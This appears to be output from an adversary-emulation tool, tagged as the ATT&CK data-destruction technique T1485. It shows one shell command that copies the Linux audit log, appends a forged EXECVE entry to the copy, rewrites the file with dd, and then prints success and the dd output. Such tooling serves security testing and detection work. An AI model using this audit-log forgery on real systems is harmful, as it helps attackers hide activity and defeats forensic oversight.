[+] Tactic ID   : T1485 
[+] Technique   : Data Destruction using dd
[+] Command     :
cp /var/log/audit/audit.log /tmp/audit_copy.log; EPOCH_TIME=$(date +%s.%3N); TMP_ENTRY="/tmp/new_execve_entry.log"; MANIPULATED_LOG="/tmp/audit_copy.log"; echo "type=EXECVE msg=audit($EPOCH_TIME:Sputnik) argc=2 a0=\"hostname\" a1=\"-I\"" > "$TMP_ENTRY"; cat "$TMP_ENTRY" >> "$MANIPULATED_LOG"; FILE_SIZE=$(stat -c%s "$MANIPULATED_LOG"); dd if="$MANIPULATED_LOG" of="$MANIPULATED_LOG" bs=1 count="$FILE_SIZE" conv=notrunc
[+] Success
----- OUTPUT START -----
7280114+0 records in
7280114+0 records out
7280114 bytes (7.3 MB, 6.9 MiB) copied, 23.3898 s, 311 kB/s
----- OUTPUT END -----
